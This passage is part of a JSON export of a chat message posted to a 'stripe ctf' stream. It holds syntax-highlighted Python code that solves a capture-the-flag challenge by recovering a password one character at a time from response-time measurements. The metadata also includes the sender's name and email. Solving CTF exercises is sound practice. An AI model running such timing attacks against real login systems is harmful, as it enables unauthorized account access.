class=\"p\">(</span><span class=\"n\">pwd</span><span class=\"p\">,</span> <span class=\"n\">ntries</span><span class=\"p\">):</span>\n    <span class=\"n\">guesses</span> <span class=\"o\">=</span> <span class=\"n\">collections</span><span class=\"o\">.</span><span class=\"n\">defaultdict</span><span class=\"p\">(</span><span class=\"nb\">int</span><span class=\"p\">)</span>\n\n    <span class=\"k\">for</span> <span class=\"n\">_</span> <span class=\"ow\">in</span> <span class=\"nb\">xrange</span><span class=\"p\">(</span><span class=\"n\">ntries</span><span class=\"p\">):</span>\n        <span class=\"n\">guess</span><span class=\"p\">,</span> <span class=\"n\">time</span> <span class=\"o\">=</span>  <span class=\"nb\">min</span><span class=\"p\">(</span>\n            <span class=\"p\">((</span><span class=\"n\">pwd</span> <span class=\"o\">+</span> <span class=\"n\">char</span><span class=\"p\">,</span> <span class=\"n\">get_time</span><span class=\"p\">(</span><span class=\"n\">pwd</span> <span class=\"o\">+</span> <span class=\"n\">char</span><span class=\"p\">))</span> <span class=\"k\">for</span> <span class=\"n\">char</span> <span class=\"ow\">in</span> <span class=\"n\">CHARS</span><span class=\"p\">),</span>\n            <span class=\"n\">key</span><span class=\"o\">=</span><span class=\"n\">operator</span><span class=\"o\">.</span><span class=\"n\">itemgetter</span><span class=\"p\">(</span><span class=\"mi\">1</span><span class=\"p\">))</span>\n\n        <span class=\"n\">guesses</span><span class=\"p\">[</span><span class=\"n\">guess</span><span class=\"p\">]</span> <span class=\"o\">+=</span> <span class=\"mi\">1</span>\n\n    <span class=\"c\">#print guesses</span>\n    <span class=\"n\">pwd</span><span class=\"p\">,</span> <span class=\"n\">n</span> <span class=\"o\">=</span> <span class=\"nb\">max</span><span class=\"p\">(</span><span class=\"n\">guesses</span><span class=\"o\">.</span><span class=\"n\">iteritems</span><span class=\"p\">(),</span> <span class=\"n\">key</span><span class=\"o\">=</span><span class=\"n\">operator</span><span class=\"o\">.</span><span class=\"n\">itemgetter</span><span class=\"p\">(</span><span class=\"mi\">1</span><span class=\"p\">))</span>\n\n    <span class=\"k\">return</span> <span class=\"n\">pwd</span> <span class=\"k\">if</span> <span class=\"n\">is_password_correct</span><span class=\"p\">(</span><span class=\"n\">pwd</span><span class=\"p\">)</span> <span class=\"k\">else</span> <span class=\"n\">guess_password</span><span class=\"p\">(</span><span class=\"n\">pwd</span><span class=\"p\">,</span> <span class=\"n\">ntries</span><span class=\"p\">)</span>\n\n<span class=\"k\">def</span> <span class=\"nf\">main</span><span class=\"p\">():</span>\n    <span class=\"n\">pwd</span> <span class=\"o\">=</span> <span class=\"s\">&#39;&#39;</span>\n    <span class=\"k\">print</span> <span class=\"n\">guess_password</span><span class=\"p\">(</span><span class=\"n\">pwd</span><span class=\"p\">,</span> <span class=\"mi\">50</span><span class=\"p\">)</span>\n\n<span class=\"k\">if</span> <span class=\"n\">__name__</span> <span class=\"o\">==</span> <span class=\"s\">&#39;__main__&#39;</span><span class=\"p\">:</span>\n    <span class=\"n\">main</span><span class=\"p\">()</span>\n</pre></div>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6946455,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "paolo.moretti85@gmail.com",
            "sender_full_name": "Paolo Moretti (S'13)",
            "sender_id": 2114,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "(no subject)",
            "submessages": [],
            "timestamp": 1371488344,
            "topic_links": [],
            "type": "stream"
        }
    ],
    "msg": "",
    "result": "success"
}
